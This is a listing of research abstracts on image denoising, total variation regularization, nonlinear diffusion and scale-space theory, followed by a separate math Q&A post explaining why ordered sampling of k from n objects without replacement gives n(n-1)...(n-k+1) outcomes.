Conference Paper Many image processing methods such as corner detection, optical flow and iterative enhancement make use of image tensors. Generally, these tensors are estimated using the structure tensor. In this work we show that the gradient energy tensor can be used as an alternative to the structure tensor in several cases. We apply the gradient energy tensor to common image problem applications such as corner detection, optical flow and image enhancement. Our experimental results suggest that the gradient energy tensor enables real-time tensor-based image enhancement on the graphics processing unit (GPU), and we obtain a 40% increase in frame rate without loss of image quality.

Article Full-text available We discuss the resolving power of three geophysical imaging and inversion techniques, and their combination, for the reconstruction of material parameters in the Earth's subsurface. The governing equations are those of Newton and Poisson for gravitational problems, the acoustic wave equation under Hookean elasticity for seismology, and the geodynamics equations of Stokes for incompressible steady-state flow in the mantle. The observables are the gravitational potential, the seismic displacement, and the surface velocity, all measured at the surface. The inversion parameters of interest are the mass density, the acoustic wave speed, and the viscosity. These systems of partial differential equations and their adjoints were implemented in a single Python code using the finite-element library FEniCS.
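As a point of reference for the comparison above, the classical structure tensor is the smoothed outer product of the gradient, J = K_ρ * (∇u ∇uᵀ). A small NumPy sketch (our own illustration; a 3×3 box average stands in for the Gaussian K_ρ, and the function names are ours):

```python
import numpy as np

def box_blur(a):
    # 3x3 box average with replicated borders, a cheap stand-in
    # for Gaussian smoothing of the tensor entries.
    h, w = a.shape
    p = np.pad(a, 1, mode='edge')
    return sum(p[i:i + h, j:j + w] for i in range(3) for j in range(3)) / 9.0

def structure_tensor(u):
    # Entries J11 = K*(u_x^2), J12 = K*(u_x u_y), J22 = K*(u_y^2);
    # the eigenvalues and eigenvectors of J encode local contrast and
    # orientation, which is what steers anisotropic diffusion.
    ux, uy = np.gradient(np.asarray(u, dtype=float))
    return box_blur(ux * ux), box_blur(ux * uy), box_blur(uy * uy)
```

For a pure ramp u(x, y) = x the tensor is constant with a single nonzero eigenvalue; corner detectors look for locations where both eigenvalues are large.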
To investigate the shape of the cost functions, we present a grid search in the parameter space for three end-member geological settings: a falling block, a subduction zone, and a mantle plume. The performance of a gradient-based inversion for each single observable separately, and in combination, is presented. We furthermore investigate the performance of a shape-optimizing inverse method, when the material is known, and an inversion that inverts for the material parameters of an anomaly with known shape.

Article Automatically learning features, especially robust features, has attracted much attention in the machine learning community. In this paper, we propose a new method to learn non-linear robust features by taking advantage of the data manifold structure. We first follow the commonly used trick of the trade, that is, learning robust features with artificially corrupted data, i.e. training samples with manually injected noise. Following the idea of the auto-encoder, we first assume that features should contain enough information to reconstruct the input well from its corrupted copies. However, merely reconstructing clean input from its noisy copies could make the data manifold in the feature space noisy. To address this problem, we propose a new method, called Incremental Auto-Encoders, to iteratively denoise the extracted features. We assume the noisy manifold structure is caused by a diffusion process. Consequently, we reverse this specific diffusion process to further contract this noisy manifold, which results in an incremental optimization of model parameters. Furthermore, we show these learned non-linear features can be stacked into a hierarchy of features. Experimental results on real-world datasets demonstrate that the proposed method can achieve better classification performances.

Preprint Full-text available Convolutional neural networks (CNNs) often perform well, but their stability is poorly understood.
To address this problem, we consider the simple prototypical problem of signal denoising, where classical approaches such as nonlinear diffusion, wavelet-based methods and regularisation offer provable stability guarantees. To transfer such guarantees to CNNs, we interpret numerical approximations of these classical methods as a specific residual network (ResNet) architecture. This leads to a dictionary which allows one to translate diffusivities, shrinkage functions, and regularisers into activation functions, and enables direct communication between the four research communities. On the CNN side, it does not only inspire new families of nonmonotone activation functions, but also introduces intrinsically stable architectures for an arbitrary number of layers.

Chapter We introduce a novel scale-space concept that is inspired by inpainting-based lossy image compression and the recent denoising-by-inpainting method of Adam et al. (2017). In the discrete setting, the main idea behind these so-called sparsification scale-spaces is as follows: starting with the original image, one successively removes pixels until a single pixel is left. In each removal step the missing data are interpolated with an inpainting method based on a partial differential equation.
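The dictionary between explicit diffusion schemes and residual blocks described above can be made concrete in a few lines. In the sketch below (our own NumPy illustration with a Perona-Malik diffusivity; parameter names and default values are ours), one explicit step u^{k+1} = u^k + τ ∂_x(g(u_x²) u_x) has exactly the u + F(u) structure of a ResNet block:

```python
import numpy as np

def diffusion_step(u, tau=0.2, lam=0.1):
    # One explicit step u^{k+1} = u^k + tau * d_x( g(u_x^2) u_x ):
    # a residual update u + F(u), where the diffusivity g plays the
    # role of a (rescaled) activation acting on finite differences.
    ux = np.diff(u)                          # forward differences u_x
    g = 1.0 / (1.0 + (ux / lam) ** 2)        # Perona-Malik diffusivity
    flux = g * ux
    # Divergence with reflecting boundaries (zero flux at both ends).
    div = np.diff(np.concatenate(([0.0], flux, [0.0])))
    return u + tau * div
```

Because the padded flux telescopes, each step preserves the average grey value; iterating the step corresponds to stacking residual blocks with shared weights.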
We demonstrate that under fairly mild assumptions on the inpainting operator this general concept indeed satisfies crucial scale-space properties such as gradual image simplification, a discrete semigroup property or invariances. Moreover, our experiments show that it can be tailored towards specific needs by selecting the inpainting operator and the pixel sparsification strategy in an appropriate way. This may lead either to uncommitted scale-spaces or to highly committed, image-adapted ones.

Article This paper investigates a novel variational optimization model for image denoising. Within this work, a bilevel optimization technique with a suitable mathematical background is proposed to automatically detect three crucial parameters: α0, α1 and θ. The parameters α0, α1 control the Total Generalized Variation (TGV) regularization, while the parameter θ is related to the anisotropic diffusive tensor. A proper selection of these parameters represents a challenging task. Since these parameters are always related to a better approximation of the image gradient and texture, their computation plays a major role in preserving the image features. Analytically, we include results on the approximation of these parameters as well as the resolution of the encountered bilevel problem in a suitable framework. In addition, to solve the PDE-constrained minimization problem, a modified primal-dual algorithm is proposed. Finally, numerical results are provided to remove noise and simultaneously preserve fine details and important features, with numerous comparisons to show the performance of the proposed approach.

Chapter Full-text available So far we have been concerned with the theory of scale-space representation and its application to feature detection in image data. A basic functionality of a computer vision system, however, is the ability to derive information about the three-dimensional shape of objects in the world.
Article Full-text available Lagrangian and augmented Lagrangian methods for nondifferentiable optimization problems that arise from the total bounded variation formulation of image restoration problems are analyzed. Conditional convergence of the Uzawa algorithm and unconditional convergence of the first order augmented Lagrangian schemes are discussed. A Newton type method based on an active set strategy defined by means of the dual variables is developed and analyzed. Numerical examples for blocky signals and images perturbed by very high noise are included.

Article Full-text available A convergence rate is established for nonstationary iterated Tikhonov regularization, applied to ill-posed problems involving closed, densely defined linear operators, under general conditions on the iteration parameters. It is also shown that an order-optimal accuracy is attained when a certain a posteriori stopping rule is used to determine the iteration number.

Article Full-text available Spectral theory for bounded linear operators is used to develop a general class of approximation methods for the Moore-Penrose generalized inverse of a closed, densely defined linear operator. Issues of convergence and stability are addressed and the methods are modified to provide a stable class of methods for evaluation of unbounded linear operators.
Article Full-text available A constrained optimization type of numerical algorithm for removing noise from images is presented. The total variation of the image is minimized subject to constraints involving the statistics of the noise. The constraints are imposed using Lagrange multipliers. The solution is obtained using the gradient-projection method. This amounts to solving a time-dependent partial differential equation on a manifold determined by the constraints. As t → ∞ the solution converges to a steady state which is the denoised image. The numerical algorithm is simple and relatively fast. The results appear to be state-of-the-art for very noisy images. The method is noninvasive, yielding sharp edges in the image. The technique could be interpreted as a first step of moving each level set of the image normal to itself with velocity equal to the curvature of the level set divided by the magnitude of the gradient of the image, and a second step which projects the image back onto the constraint set.

Book Full-text available Introduction.- Convex Analysis and the Scalar Case.- Convex Sets and Convex Functions.- Lower Semicontinuity and Existence Theorems.- The One Dimensional Case.- Quasiconvex Analysis and the Vectorial Case.- Polyconvex, Quasiconvex and Rank one Convex Functions.- Polyconvex, Quasiconvex and Rank one Convex Envelopes.- Polyconvex, Quasiconvex and Rank one Convex Sets.- Lower Semicontinuity and Existence Theorems in the Vectorial Case.- Relaxation and Non Convex Problems.- Relaxation Theorems.- Implicit Partial Differential Equations.- Existence of Minima for Non Quasiconvex Integrands.- Miscellaneous.- Function Spaces.- Singular Values.- Some Underdetermined Partial Differential Equations.- Extension of Lipschitz Functions on Banach Spaces.- Bibliography.- Index.- Notations.
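In its unconstrained Lagrangian form, the constrained TV minimisation described above is often approached by explicit gradient descent on a smoothed total variation energy. The following 1D sketch (our own NumPy illustration with hypothetical default parameters, not the gradient-projection scheme of the paper) descends on E(u) = Σ sqrt(u_x² + ε²) + (λ/2) Σ (u − f)²:

```python
import numpy as np

def tv_denoise_1d(f, lam=0.5, tau=0.02, steps=300, eps=0.1):
    # Explicit gradient descent on the smoothed ROF energy
    #   E(u) = sum sqrt(u_x^2 + eps^2) + (lam/2) * sum (u - f)^2.
    u = np.asarray(f, dtype=float).copy()
    for _ in range(steps):
        ux = np.diff(u)
        flux = ux / np.sqrt(ux * ux + eps * eps)   # gradient of the TV term
        div = np.diff(np.concatenate(([0.0], flux, [0.0])))
        u += tau * (div - lam * (u - f))
    return u
```

The small eps removes the non-differentiability of |u_x| at zero; tau must stay below roughly eps/2 for this naive explicit scheme to remain stable, which is why the constrained projection or primal-dual formulations are preferred in practice.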
Article Full-text available Diffusion processes create multi-scale analyses, which enable the generation of simplified pictures, where for increasing scale the image gets sketchier. In many practical applications the "scaled image" can be characterized via a variational formulation as the solution of a minimization problem involving unbounded operators. These unbounded operators can be evaluated by regularization techniques. We show that the theory of stable evaluation of unbounded operators can be applied to efficiently solve these minimization problems.

Article Full-text available A reliable and efficient computational algorithm for restoring blurred and noisy images is proposed. The restoration process is based on the minimal total variation principle introduced by Rudin et al. For discrete images, the proposed algorithm minimizes a piecewise linear ℓ1 function (a measure of total variation) subject to a single 2-norm inequality constraint (a measure of data fit). The algorithm starts by finding a feasible point for the inequality constraint using a (partial) conjugate gradient method. This corresponds to a deblurring process. Noise and other artifacts are removed by a subsequent total variation minimization process. The use of the linear ℓ1 objective function for the total variation measurement leads to a simpler computational algorithm. Both the steepest descent and an affine scaling Newton method are considered to solve this constrained piecewise linear ℓ1 minimization problem. The resulting algorithm, when viewed as an image restoration and enhancement process, has the feature that it can be used in an adaptive/interactive manner in situations when knowledge of the noise variance is either unavailable or unreliable.
Numerical examples are presented to demonstrate the effectiveness of the proposed iterative image restoration and enhancement process.

Article Full-text available
Mathematical results on ill-posed and ill-conditioned problems are reviewed and the formal aspects of regularization theory in the linear case are introduced. Specific topics in early vision and their regularization are then analyzed rigorously, characterizing existence, uniqueness, and stability of solutions. A fundamental difficulty that arises in almost every vision problem is scale, that is, the resolution at which to operate. Methods that have been proposed to deal with the problem include scale-space techniques that consider the behavior of the result across a continuum of scales. From the point of view of regularization theory, the concept of scale is related quite directly to the regularization parameter λ. It is suggested that methods used to obtain the optimal value of λ may provide, either directly or after suitable modification, the optimal scale associated with the specific instance of certain problems.

Book Full-text available
A basic problem when deriving information from measured data, such as images, originates from the fact that objects in the world, and hence image structures, exist as meaningful entities only over certain ranges of scale. "Scale-Space Theory in Computer Vision" describes a formal theory for representing the notion of scale in image data, and shows how this theory applies to essential problems in computer vision such as computation of image features and cues to surface shape. The subjects range from the mathematical foundation to practical computational techniques. The power of the methodology is illustrated by a rich set of examples. This book is the first monograph on scale-space theory.
It is intended as an introduction, reference, and inspiration for researchers, students, and system designers in computer vision as well as related fields such as image processing, photogrammetry, medical image analysis, and signal processing in general.

Conference Paper Full-text available
Computational vision often needs to deal with derivatives of digital images. Such derivatives are not intrinsic properties of digital data; a paradigm is required to make them well-defined. Normally, a linear filtering is applied. This can be formulated in terms of scale-space, functional minimization, or edge detection filters. The main emphasis of this paper is to connect these theories in order to gain insight into their similarities and differences. We take regularization (or functional minimization) as a starting point, and show that it boils down to Gaussian scale-space if we require scale invariance and a semi-group constraint to be satisfied. This regularization implies the minimization of a functional containing terms up to infinite order of differentiation. If the functional is truncated at second order, the Canny-Deriche filter arises.

Article Full-text available
We discuss a semidiscrete framework for nonlinear diffusion scale-spaces, where the image is sampled on a finite grid and the scale parameter is continuous. This leads to a system of nonlinear ordinary differential equations. We investigate conditions under which one can guarantee well-posedness properties, an extremum principle, average grey level invariance, smoothing Lyapunov functionals, and convergence to a constant steady-state. These properties are in analogy to previously established results for the continuous setting.
Interestingly, this semidiscrete framework helps to explain the so-called Perona-Malik paradox: The Perona-Malik equation is a forward-backward diffusion equation which is widely used in image processing since it combines intraregional smoothing with edge enhancement. Although its continuous formulation is regarded to be ill-posed, it turns out that a spatial discretization is sufficient to create a well-posed semidiscrete diffusion scale-space. We also pro...

Book
I: Parametric Minimal Surfaces.- 1. Functions of Bounded Variation and Caccioppoli Sets.- 2. Traces of BV Functions.- 3. The Reduced Boundary.- 4. Regularity of the Reduced Boundary.- 5. Some Inequalities.- 6. Approximation of Minimal Sets (I).- 7. Approximation of Minimal Sets (II).- 8. Regularity of Minimal Surfaces.- 9. Minimal Cones.- 10. The First and Second Variation of the Area.- 11. The Dimension of the Singular Set.- II: Non-Parametric Minimal Surfaces.- 12. Classical Solutions of the Minimal Surface Equation.- 13. The a priori Estimate of the Gradient.- 14. Direct Methods.- 15. Boundary Regularity.- 16. A Further Extension of the Notion of Non-Parametric Minimal Surface.- 17. The Bernstein Problem.- Appendix A.- Appendix B.- Appendix C.

Article
Shock filters for image enhancement are developed. The filters use new nonlinear time dependent partial differential equations and their discretizations. The evolution of the initial image $u_0 (x,y)$ as $t \to \infty$ into a steady state solution $u_\infty (x,y)$ through $u(x,y,t)$, $t > 0$, is the filtering process. The partial differential equations have solutions which satisfy a maximum principle. Moreover the total variation of the solution for any fixed $t > 0$ is the same as that of the initial data. The processed image is piecewise smooth, nonoscillatory, and the jumps occur across zeros of an elliptic operator (edge detector). The algorithm is relatively fast and easy to program.
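The semidiscrete Perona-Malik discussion above boils down, after an explicit time discretization, to a simple pixel-grid update. The following 1D sketch is illustrative only: it uses the common exponential diffusivity $g(s) = \exp(-(s/K)^2)$ with arbitrary values for the contrast parameter K and the time step, and periodic boundaries via `np.roll`.

```python
import numpy as np

def perona_malik_1d(u0, K=0.5, dt=0.2, steps=100):
    """Explicit Perona-Malik diffusion on a 1D signal.
    The diffusivity g(s) = exp(-(s/K)^2) suppresses smoothing across
    large gradients (edges) while smoothing within regions."""
    u = u0.astype(float).copy()
    for _ in range(steps):
        # differences toward the right and left neighbours
        dr = np.roll(u, -1) - u
        dl = np.roll(u, 1) - u
        # gradient-dependent diffusivities (small across edges)
        gr = np.exp(-(dr / K) ** 2)
        gl = np.exp(-(dl / K) ** 2)
        u = u + dt * (gr * dr + gl * dl)
    return u

# a noisy step edge: the noise is smoothed while the jump survives
x = np.concatenate([np.zeros(32), np.ones(32)])
rng = np.random.default_rng(1)
noisy = x + 0.05 * rng.standard_normal(64)
smoothed = perona_malik_1d(noisy)
```

With dt ≤ 0.5 the explicit scheme satisfies a discrete extremum principle, which is exactly the well-posedness point the semidiscrete framework makes: the spatially discretized equation behaves, even though the continuous PDE is ill-posed.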
Article
A new version of the Perona and Malik theory for edge detection and image restoration is proposed. This new version keeps all the improvements of the original model and avoids its drawbacks: it is proved to be stable in the presence of noise, with existence and uniqueness results. Numerical experiments on natural images are presented.

Article
The authors analyze an initial-boundary value problem for the equation $u_t = \varphi (u_x )_x + \tau \psi (u_x )_{xt}$, where $\tau$ is a positive parameter, $\varphi ,\psi :{\bf R} \to {\bf R}$, $\varphi$ is nonmonotone, $\psi$ is strictly increasing and uniformly bounded in ${\bf R}$, and $|\varphi '(p)| = O(\psi '(p))$ as $p \to \pm \infty$. The equation arises as a (new) model for turbulent heat or mass transfer in stably stratified shear flows, in which case $u_x$ is nonnegative, $\varphi (p) > 0$ for $p > 0$, and $\varphi (0) = \varphi ( + \infty ) = 0$. Well-posedness is proved and, in the model case, the qualitative behavior of solutions is studied. In particular it is shown that smooth solutions may become discontinuous in finite time, and that such solutions converge to a piecewise constant spatial profile as $t \to \infty$. This behavior is in agreement with experimental observations and numerical computations.

Article
Let A be an operator from a real Banach space into a real Hilbert space. In this paper we study least squares regularization methods for the ill-posed operator equation A(u) = f using nonlinear nondifferentiable penalty functionals. We introduce a notion of distributional approximation, and use constructs of distributional approximations to establish convergence and stability of approximations of bounded variation solutions of the operator equation. We also show that the results provide a framework for a rigorous analysis of numerical methods based on Euler-Lagrange equations to solve the minimization problem.
This justifies many of the numerical implementation schemes of bounded variation minimization that have been recently proposed.

Article
The problem of recovering images with sharp edges by total variation denoising has recently received considerable attention in image processing. Numerical difficulties in implementing this nonlinear filter technique are partly due to the fact that it involves the stable evaluations of unbounded operators. To overcome that difficulty we propose to approximate the evaluation of the unbounded operator by a stable approximation. A convergence analysis for this regularized approach is presented.

Thesis
In this work a scale-space framework has been presented which does not require any monotony assumption (comparison principle). We have seen that, besides the fact that many global smoothing scale-space properties are maintained, new possibilities with respect to image restoration appear. Rather than deducing a unique equation from first principles, we have analyzed well-posedness and scale-space properties of a general family of regularized anisotropic diffusion filters. Existence and uniqueness results, continuous dependence of the solution on the initial image, maximum-minimum principles, invariances, Lyapunov functionals, and convergence to a constant steady state have been established. The large class of Lyapunov functionals makes it possible to regard these filters in numerous ways as simplifying, information-reducing transformations. These global smoothing properties do not contradict seemingly opposite local effects such as edge enhancement. For this reason it is possible to design scale-spaces with restoration properties giving segmentation-like results. Prerequisites have been stated under which one can prove well-posedness and scale-space results in the continuous, semidiscrete and discrete setting. Each of these frameworks stands on its own and does not require the others.
On the other hand, the prerequisites in all three settings reveal many similarities and, as a consequence, representatives of the semidiscrete class can be obtained by suitable spatial discretizations of the continuous class, while representatives of the discrete class may arise from time discretizations of semidiscrete filters. The degree of freedom within the proposed class of filters can be used to tailor the filters towards specific restoration tasks. Therefore, these scale-spaces do not need to be uncommitted; they give the user the liberty to incorporate a-priori knowledge, for instance concerning size and contrast of especially interesting features. The analyzed class comprises linear diffusion filtering and the nonlinear isotropic model of Catté, Lions, Morel, Coll and Whitaker and Pizer, but also novel approaches have been proposed: The use of diffusion tensors instead of scalar-valued diffusivities puts us in a position to design real anisotropic diffusion processes which may reveal advantages at noisy edges. Last but not least, the fact that these filters are steered by the structure tensor instead of the regularized gradient allows adapting them to more sophisticated tasks such as the enhancement of coherent flow-like structures. In view of these results, anisotropic diffusion deserves to be regarded as much more than an ad-hoc strategy for transforming a degraded image into a more pleasant looking one. It is a flexible and mathematically sound class of methods which ties the advantages of two worlds: scale-space analysis and image restoration.

Article
Regularization with functions of bounded variation has been proven to be effective for denoising signals and images. This nonlinear regularization technique, in contrast with linear regularization techniques like Tikhonov regularization, has the advantage that discontinuities in signals and images can be located very precisely.
In this paper bounded variation regularization is generalized to functions with higher order derivatives of bounded variation. This concept is applied to locate discontinuities in derivatives, which has important applications in parameter estimation problems.

Article
We study here a classical image denoising technique introduced by L. Rudin and S. Osher a few years ago, namely the constrained minimization of the total variation (TV) of the image. First, we give results of existence and uniqueness and prove the link between the constrained minimization problem and the minimization of an associated Lagrangian functional. Then we describe a relaxation method for computing the solution, and give a proof of convergence. After this, we explain why the TV-based model is well suited to the recovery of some images and not of others. We eventually propose an alternative approach whose purpose is to handle the minimization of the minimum of several convex functionals. We propose for instance a variant of the original TV minimization problem that handles correctly some situations where TV fails.

Conference Paper
We show that regularization methods can be regarded as scale-spaces where the regularization parameter serves as scale. In analogy to nonlinear diffusion filtering we establish continuity with respect to scale, causality in terms of a maximum/minimum principle, simplification properties by means of Lyapunov functionals and convergence to a constant steady-state. We identify nonlinear regularization with a single implicit time step of a diffusion process. This implies that iterated regularization with small regularization parameters is a numerical realization of a diffusion filter. Numerical experiments in two and three space dimensions illustrate the scale-space behaviour of regularization methods.

Article
A global edge detection algorithm based on variational regularization is presented and analysed.
The algorithm can also be viewed as an anisotropic diffusion method. These two quite different methods are thereby unified from the original outlook. This puts anisotropic diffusion, as a method in early vision, on more solid grounds; it is just as well founded as the well-accepted standard regularization techniques. The unification also brings the anisotropic diffusion method an appealing sense of optimality, thereby intuitively explaining its extraordinary performance. The algorithm to be presented, moreover, has the following attractive properties:
1. It only requires the solution of a single boundary value problem over the entire image domain — almost always a very simple (rectangular) region.
2. It converges to the solution of interest.
The first of these properties implies very significant advantages over other existing regularization methods; the computation cost is typically cut by an order of magnitude or more. The second property represents considerable advantages over the existing diffusion methods; it removes the problem of deciding when to stop, as well as that of actually stopping the diffusion process.

Conference Paper
Many image processing problems are ill-posed and must be regularized. Usually, a roughness penalty is imposed on the solution. The difficulty is to avoid the smoothing of edges, which are very important attributes of the image. The authors first give sufficient conditions for the design of such an edge-preserving regularization. Under these conditions, it is possible to introduce an auxiliary variable whose role is twofold. Firstly, it marks the discontinuities and ensures their preservation from smoothing. Secondly, it makes the criterion half-quadratic. The optimization is then easier. The authors propose a deterministic strategy, based on alternate minimizations on the image and the auxiliary variable. This yields two algorithms, ARTUR and LEGEND.
The authors apply these algorithms to the problem of SPECT reconstruction.

Article
We propose the minimization of a nonquadratic functional or, equivalently, a nonlinear diffusion model to smooth noisy image functions $g:\Omega \subset \mathbb{R}^n \to \mathbb{R}$ while preserving significant transitions of the data. The model is chosen such that important properties of the conventional quadratic-functional approach still hold: (1) existence of a unique solution continuously depending on the data $g$ and (2) stability of approximations using the standard finite-element method. Relations with other global approaches for the segmentation of image data are discussed. Numerical experiments with real data illustrate this approach.

Article
This book contains both a synthesis and mathematical analysis of a wide set of algorithms and theories whose aim is the automatic segmentation of digital images as well as the understanding of visual perception. A common formalism for these theories and algorithms is obtained in a variational form. Thanks to this formalization, mathematical questions about the soundness of algorithms can be raised and answered. Perception theory has to deal with the complex interaction between regions and "edges" (or boundaries) in an image: in the variational segmentation energies, "edge" terms compete with "region" terms in a way which is supposed to impose regularity on both regions and boundaries. This fact was an experimental guess in perception phenomenology and computer vision until it was proposed as a mathematical conjecture by Mumford and Shah. The third part of the book presents a unified presentation of the evidence in favour of the conjecture. It is proved that the competition of one-dimensional and two-dimensional energy terms in a variational formulation cannot create fractal-like behaviour for the edges.
The proof of regularity for the edges of a segmentation constantly involves concepts from geometric measure theory, which proves to be central in image processing theory. The second part of the book provides a fast and self-contained presentation of the classical theory of rectifiable sets (the "edges") and unrectifiable sets ("fractals").

Article
Tikhonov regularization with a modified total variation regularization functional is used to recover an image from noisy, blurred data. This approach is appropriate for image processing in that it does not place a priori smoothness conditions on the solution image. An efficient algorithm is presented for the discretized problem that combines a fixed point iteration to handle nonlinearity with a new, effective preconditioned conjugate gradient iteration for large linear systems. Reconstructions, convergence results, and a direct comparison with a fast linear solver are presented for a satellite image reconstruction application.

Article
We present a blind deconvolution algorithm based on the total variation (TV) minimization method proposed by Acar and Vogel (1994). The motivation for regularizing with the TV norm is that it is extremely effective for recovering edges of images as well as some blurring functions, e.g., motion blur and out-of-focus blur. An alternating minimization (AM) implicit iterative scheme is devised to recover the image and simultaneously identify the point spread function (PSF). Numerical results indicate that the iterative scheme is quite robust, converges very fast (especially for discontinuous blur), and both the image and the PSF can be recovered under the presence of high noise level.
Finally, we remark that PSFs without sharp edges, e.g., Gaussian blur, can also be identified through the TV approach.

Article
One popular method for the recovery of an ideal intensity image from corrupted or indirect measurements is regularization: minimize an objective function that enforces a roughness penalty in addition to coherence with the data. Linear estimates are relatively easy to compute but generally introduce systematic errors; for example, they are incapable of recovering discontinuities and other important image attributes. In contrast, nonlinear estimates are more accurate but are often far less accessible. This is particularly true when the objective function is nonconvex, and the distribution of each data component depends on many image components through a linear operator with broad support. Our approach is based on an auxiliary array and an extended objective function in which the original variables appear quadratically and the auxiliary variables are decoupled. Minimizing over the auxiliary array alone yields the original function so that the original image estimate can be obtained by joint minimization. This can be done efficiently by Monte Carlo methods, for example by FFT-based annealing using a Markov chain that alternates between (global) transitions from one array to the other. Experiments are reported in optical astronomy, with space telescope data, and computed tomography.

Article
A novel method of reconstruction from single-photon emission computerized tomography data is proposed. This method builds on the expectation-maximization (EM) approach to maximum likelihood reconstruction from emission tomography data, but aims instead at maximum posterior probability estimation, which takes account of prior belief about smoothness in the isotope concentration. A novel modification to the EM algorithm yields a practical method.
The method is illustrated by an application to data from brain scans.

Article
The authors describe a model of nonlinear image filtering for noise reduction and edge enhancement using anisotropic diffusion. The method is designed to enhance not only edges, but corners and T junctions as well. The method roughly corresponds to a nonlinear diffusion process with backward heat flow across the strong edges. Such a process is ill posed, making the results depend strongly on how the algorithm differs from the diffusion process. Two ways of modifying the equations using simulations on a variable grid are studied.

Article
A new definition of scale-space is suggested, and a class of algorithms used to realize a diffusion process is introduced. The diffusion coefficient is chosen to vary spatially in such a way as to encourage intraregion smoothing rather than interregion smoothing. It is shown that the 'no new maxima should be generated at coarse scales' property of conventional scale space is preserved. As the region boundaries in the approach remain sharp, a high-quality edge detector which successfully exploits global information is obtained. Experimental results are shown on a number of images. Parallel hardware implementations are made feasible because the algorithm involves elementary, local operations replicated over the image.

Article
A computational algorithm is proposed for image enhancement based on total variation minimization with constraints. This constrained minimization problem is introduced by Rudin et al [13, 14, 15] to enhance blurred and noisy images. Our computational algorithm solves the constrained minimization problem directly by adapting the affine scaling method for the unconstrained $l_1$ problem [3]. The resulting computational scheme, when viewed as an image enhancement process, has the feature that it can be used in an interactive manner in situations where knowledge of the noise level is either unavailable or unreliable.
This computational algorithm can be implemented with a conjugate gradient method. It is further demonstrated that the iterative enhancement process is efficient. Key words: image enhancement, image reconstruction, deconvolution, minimal total variation, affine scaling algorithm, projected gradient method.

Article
This paper gives an overview of scale-space and image enhancement techniques which are based on parabolic partial differential equations in divergence form. In the nonlinear setting this filter class allows the integration of a-priori knowledge into the evolution. We sketch basic ideas behind the different filter models, discuss their theoretical foundations and scale-space properties, discrete aspects, suitable algorithms, generalizations, and applications. During the last decade nonlinear diffusion filters have become a powerful and well-founded tool in multiscale image analysis. These models allow the inclusion of a-priori knowledge into the scale-space evolution, and they lead to an image simplification which simultaneously preserves or even enhances semantically important information such as edges, lines, or flow-like structures. Many papers have appeared proposing different models, investigating their theoretical foundations, and describing interesting applications. For a...

Article
This paper presents an abstract analysis of bounded variation (BV) methods for ill-posed operator equations Au = z. Let $T(u) := \|Au - z\|^2 + \alpha J(u)$, where the penalty, or "regularization", parameter $\alpha > 0$ and the functional J(u) is the BV norm or seminorm of u, also known as the total variation of u. Under mild restrictions on the operator A and the functional J(u), it is shown that the functional T(u) has a unique minimizer which is stable with respect to certain perturbations in the data z, the operator A, the parameter $\alpha$, and the functional J(u).
In addition, convergence results are obtained which apply when these perturbations vanish and the regularization parameter is chosen appropriately. Key words: total variation, bounded variation, regularization, compact operator equations, ill-posed problems. AMS(MOS) subject classifications: 49J10, 49J27, 49J45, 49K40, 65R30. Consider the equation Au = z (1.1), where A is a linear operator from $L^p$(...

Article
In total variation denoising, one attempts to remove noise from a signal or image by solving a nonlinear minimization problem involving a total variation criterion. Several approaches based on this idea have recently been shown to be very effective, particularly for denoising functions with discontinuities. This paper analyzes the convergence of an iterative method for solving such problems. The iterative method involves a "lagged diffusivity" approach in which a sequence of linear diffusion problems are solved. Global convergence in a finite dimensional setting is established, and local convergence properties, including rates and their dependence on various parameters, are examined. Key words: denoising, total variation, convergence analysis. AMS(MOS) subject classifications: 49M05, 65K10. Consider the problem of reconstructing an unknown function u, called the image, from data z satisfying z = u + ε (1.1). Here ε represents error, or noise, in the data. It i...
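The "lagged diffusivity" idea in the last abstract freezes the nonlinear diffusivity at the previous iterate, so each step reduces to a linear solve. The following 1D sketch is illustrative, not the paper's code: it uses a smoothed TV term with smoothing parameter `beta`, a dense solve for clarity, and arbitrary values for the regularization weight `alpha`.

```python
import numpy as np

def lagged_diffusivity_1d(z, alpha=1.0, beta=1e-3, iters=30):
    """Fixed-point iteration for min_u alpha*TV_beta(u) + 0.5*||u - z||^2.
    Each step solves the linear system (I + alpha * D^T W D) u = z, where
    the diagonal W holds diffusivities 1/sqrt((Du)^2 + beta) 'lagged'
    from the previous iterate."""
    n = len(z)
    # forward-difference matrix D of shape (n-1, n)
    D = np.zeros((n - 1, n))
    for i in range(n - 1):
        D[i, i], D[i, i + 1] = -1.0, 1.0
    u = z.copy()
    for _ in range(iters):
        w = 1.0 / np.sqrt((D @ u) ** 2 + beta)   # lagged diffusivities
        A = np.eye(n) + alpha * D.T @ (w[:, None] * D)
        u = np.linalg.solve(A, z)                # one linear diffusion solve
    return u

# denoise a noisy step; the discontinuity stays sharp
rng = np.random.default_rng(2)
z = np.concatenate([np.zeros(30), np.ones(30)]) + 0.1 * rng.standard_normal(60)
u = lagged_diffusivity_1d(z)
```

Each iteration is exactly the "linear diffusion problem" of the abstract; the sequence of solves converges to the minimizer of the smoothed TV energy.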
https://math.codidact.com/posts/282605
Q&A

# Intuitively, if you pick k out of n objects singly without replacement, why's the number of possible outcomes NOT $n(n-1) \dots [n-(k - 1)]\color{red}{(n - k)}$?

I know that $\color{limegreen}{(n-k+1)} \equiv (n - (k - 1))$. But whenever I contemplate choosing k from n objects singly without replacement, I keep muffing the number of possible outcomes as $n(n-1) \dots \color{limegreen}{(n-k+1)}\color{red}{(n - k)}$. I bungled by adding the unnecessary and wrong $\color{red}{(n - k)}$, probably because I affiliated choosing k objects with $\color{red}{(n - k)}$! How can I rectify my fencepost error? How can I intuitively remember to stop at $\color{limegreen}{(n-(k-1))}$?

### Theorem 1.4.8 (Sampling without replacement)

Consider n objects and making k choices from them, one at a time without replacement (i.e., choosing a certain object precludes it from being chosen again). Then there are $n(n-1) \dots \color{limegreen}{(n-k+1)}$ possible outcomes for $1 \le k \le n$, and 0 possibilities for $k > n$ (where order matters). By convention, $n(n-1) \dots {\color{limegreen}{(n-k+1)}} = n$ for k = 1. This result also follows directly from the multiplication rule: each sampled ball is again a sub-experiment, and the number of possible outcomes decreases by 1 each time. Note that for sampling k out of n objects without replacement, we need $k \le n$, whereas in sampling with replacement the objects are inexhaustible.

Blitzstein, Introduction to Probability (2019, 2nd ed.), p. 12.

Each term of that product gives the size of the pool when you pick an object out – it's the number of possible items you can pick out at that moment, if you're picking them one at a time. Once you've taken $k$ items out of a pool of $n$ items, there are $n - k$ objects left over.
